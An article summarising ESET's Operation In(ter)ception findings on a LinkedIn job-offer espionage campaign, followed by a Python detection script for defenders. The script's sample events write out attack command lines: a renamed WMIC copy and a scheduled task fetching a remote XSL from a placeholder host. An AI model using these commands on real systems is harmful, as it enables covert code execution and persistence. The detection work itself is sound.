ESET: A threat actor, possibly North Korea’s Lazarus group, targeted high-profile aerospace and military companies in a campaign dubbed Operation In(ter)ception. The attackers used custom malware, open source tools, fake job offers and social engineering via LinkedIn to compromise and spy on the targets
Operation In(ter)ception is the name of a cyber espionage campaign that hit high-profile aerospace and military companies in Europe and the Middle East. It was discovered by ESET cyber security experts. To compromise the victims, the attackers used social engineering via LinkedIn, hiding behind the ruse of attractive, but bogus, job offers. Having established an initial foothold, they deployed their custom, multistage malware, along with modified open-source tools. Furthermore, the threat actor made use of living-off-the-land tactics, abusing legitimate tools and OS functions. Several techniques were used to avoid detection, including code signing, regular malware recompilation and impersonating legitimate software and companies. The primary goal was espionage. However, in one of the cases, the attackers attempted to monetize access to a victim’s email account through a BEC (business email compromise) as the final stage of the operation. While there is no strong evidence connecting the attacks to a known threat actor, there are several hints suggesting a possible link to North Korea’s Lazarus group (including similarities in targeting, development environment, and anti-analysis techniques used).
How the initial compromise phase works according to the cyber security experts
According to the cyber security experts, as part of the initial compromise phase, the Operation In(ter)ception attackers created fake LinkedIn accounts posing as HR representatives of well-known companies in the aerospace and defense industries. With the profiles set up, they sought out employees of the targeted companies and messaged them with fictitious job offers using LinkedIn’s messaging feature, sneaking malware into the conversation masquerading as documents related to the job offer in question. The file was a password-protected RAR archive containing a LNK file. If opened, it started a Command Prompt that opened a remote PDF file in the target’s default browser. This PDF, seemingly containing salary information for the purported job positions, in reality served as a decoy. In the background, the Command Prompt created a new folder and copied the WMI Commandline Utility (WMIC.exe) to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied WMIC.exe. This enabled the cyber espionage actors to get their initial foothold inside the targeted company and gain persistence on the compromised computer.
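The chain described above (cmd.exe staging a renamed copy of WMIC.exe, then a scheduled task running it with a remote XSL stylesheet) leaves distinctive traces in process-creation telemetry. The following Python script is an added example written for this article, not code from ESET’s report or from the campaign, showing how a defender can flag those traces. It assumes Sysmon Event ID 1 style fields (Image, OriginalFileName, CommandLine, ParentImage); the sample events, paths, task name and the example.invalid URL are constructed placeholders, not indicators from the report. The useful property it relies on is that OriginalFileName comes from the PE version resource, so it still reads "wmic.exe" after the binary has been renamed on disk.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample events shaped like Sysmon Event ID 1 (process creation).
# None of these values are real telemetry; they mirror the chain the article describes.
SAMPLE_EVENTS = [
    {   # benign: an administrator querying WMI from the stock WMIC location
        "Image": r"C:\Windows\System32\wbem\WMIC.exe",
        "OriginalFileName": "wmic.exe",
        "CommandLine": "wmic os get caption",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # staging: cmd.exe creates a folder and copies WMIC.exe there under a new name
        "Image": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": r'cmd.exe /c mkdir "C:\Users\jdoe\AppData\Roaming\Intel" & copy C:\Windows\System32\wbem\WMIC.exe C:\Users\jdoe\AppData\Roaming\Intel\updater.exe',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # persistence: a scheduled task whose action is the renamed WMIC with a remote XSL
        "Image": r"C:\Windows\System32\schtasks.exe",
        "OriginalFileName": "schtasks.exe",
        "CommandLine": r'schtasks /create /sc minute /mo 30 /tn IntelUpdate /tr "C:\Users\jdoe\AppData\Roaming\Intel\updater.exe os get /format:https://example.invalid/update.xsl"',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # execution: the renamed binary runs; OriginalFileName still says wmic.exe
        "Image": r"C:\Users\jdoe\AppData\Roaming\Intel\updater.exe",
        "OriginalFileName": "wmic.exe",
        "CommandLine": r'updater.exe os get /format:"https://example.invalid/update.xsl"',
        "ParentImage": r"C:\Windows\System32\svchost.exe",
    },
]

# /format: followed (possibly after a quote) by an http(s) URL: a remote XSL stylesheet
REMOTE_FORMAT = re.compile(r"/format:\S*https?://", re.IGNORECASE)
# a copy command whose source is wmic.exe, bounded by the next shell operator
WMIC_COPY = re.compile(r"\bcopy\b[^&|]*\bwmic\.exe\b", re.IGNORECASE)
# schtasks action (/tr) pointing into a user profile rather than a system directory
USER_PROFILE_TASK = re.compile(r'/tr\s+"?[a-z]:\\users\\', re.IGNORECASE)


def detect(event):
    """Return the list of rule names that fire on one process-creation event."""
    hits = []
    image_name = PureWindowsPath(event.get("Image", "")).name.lower()
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "")
    lowered = cmdline.lower()

    # Rule 1: PE says wmic.exe, but the file on disk has a different name
    if original == "wmic.exe" and image_name != "wmic.exe":
        hits.append("renamed_wmic")
    # Rule 2: any command line asking WMIC to fetch and apply a remote stylesheet
    if REMOTE_FORMAT.search(cmdline):
        hits.append("wmic_remote_xsl")
    # Rule 3: cmd.exe copying wmic.exe out of its normal location (the staging step)
    if image_name == "cmd.exe" and WMIC_COPY.search(cmdline):
        hits.append("wmic_copy")
    # Rule 4: task creation whose action lives in a user-writable profile path
    if image_name == "schtasks.exe" and "/create" in lowered and USER_PROFILE_TASK.search(cmdline):
        hits.append("schtasks_persistence")
    return hits


def scan(events):
    """Return (index, hits) for every event that triggered at least one rule."""
    return [(i, detect(e)) for i, e in enumerate(events) if detect(e)]


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)}  <- {SAMPLE_EVENTS[index]['CommandLine']}")
```

Rules 1 and 2 are the high-signal ones: legitimate software almost never runs a renamed WMIC, and a stylesheet fetched over HTTP is rarely needed for administrative queries. Rules 3 and 4 catch the staging and persistence steps individually, so the chain is visible even if the analyst only sees one of the events, and correlating all four on a single host within a short window is a strong indicator of this particular technique.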